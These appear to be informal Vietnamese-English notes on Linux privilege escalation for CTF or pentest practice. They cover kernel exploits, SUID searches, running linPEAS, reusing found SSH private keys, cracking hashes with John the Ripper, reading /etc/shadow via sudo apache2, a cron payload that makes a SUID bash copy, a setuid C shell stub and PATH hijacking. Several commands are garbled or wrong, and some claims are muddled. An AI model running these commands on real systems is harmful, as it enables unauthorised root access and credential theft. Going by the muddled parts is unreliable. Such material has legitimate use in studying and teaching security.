*****Exloit kernel:

The Kernel exploit methodology is simple;

-Identify the kernel version
-Search and find an exploit code for the kernel version of the target system
-Run the exploit

*****
Ngoài ra các bạn phải sửa etc/host: di cư
dev/null: để khỏi rối
find / -perm -u=s -type f tìm fife SUID thôi
find / -user root -perm -4000 -exec ls -ldb {} \; tương tự
sudo python -m SimpleHTTPServer 80
Hints/Notes:

Being too specific about the kernel version when searching for exploits on Google, Exploit-db, or searchsploit
Be sure you understand how the exploit code works BEFORE you launch it. Some exploit codes can make changes on the operating system that would make them unsecured in further use or make irreversible changes to the system, creating problems later. Of course, these may not be great concerns within a lab or CTF environment, but these are absolute no-nos during a real penetration testing engagement.
Some exploits may require further interaction once they are run. Read all comments and instructions provided with the exploit code.
You can transfer the exploit code from your machine to the target system using the SimpleHTTPServer Python module and wget respectively.
https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS dùng nó đi
Một khi bạn đã ssh hay xâm nhập được vô server nó thì đây là lúc các bạn trở thành hắc cơ leo thang đặc quyền. THấy linpeas trên ko, wget về máy đi.
các bạ cso thể dùng scp opt/linpeas.sh admin@xxx.xxx.xx.x :etc/shadow để truyền file qua :>
sửa quyền file bằng chmod +x linpeas
sau đó chạy thôi.
Trong linpeas khi chạy nó cho màu sắc đây, chú ý đọc hiểu :>
Đôi khi bạn tìm thấy id_rsa private key :> đây là điều nguy hiểm, các bạn có thể login đc
Copy nó ra máy của các bạn và lưu vô tệp attack.
phân quyền 600: chmod 600 attack.
login lại vô ssh -i attack admin2@xxx.xxx.xx.x
nếu có mật khẩu thì dùng john the ripper thay vì hydra, vì hydra là brute từ wordlist còn jtr thì brute từng từ.
nó trả về hash rồi thì dùng wordls rockyou.txt để so sánh mã hash
Ko khó nhưng hơi cực để tư duy, nếu bạn là SK như tôi thì chúc mừng, chúng ta giống nhau
------------------------------------
Leo thang:
Kernel có vuln
History không xóa
lưu file dễ bị phát hiện,
không phân quyền /etc/shadow
ssh keys lưu trữ
find / -name id_rsa 2> /dev/null
find / -name authorized_keys 2> /dev/null
sudo -l (Shell Escaping)
sudo apache2 -f /etc/shadow (Abusing Intended Functionality)
exploit.c => (LD_PRELOAD)
Suid
Crontab
Capabilities ->getcap
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/hack.sh
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c        suid-env
   export PATH=/tmp:$PATH
find / -name docker.sock 2>/dev/null
CVE-2019-14287
Hi vọng sẽ giúp ích cho bạn, NSF khó quá nên tui không ghi :V
ps aux để xem các process chạy, để lập cách tấn công.
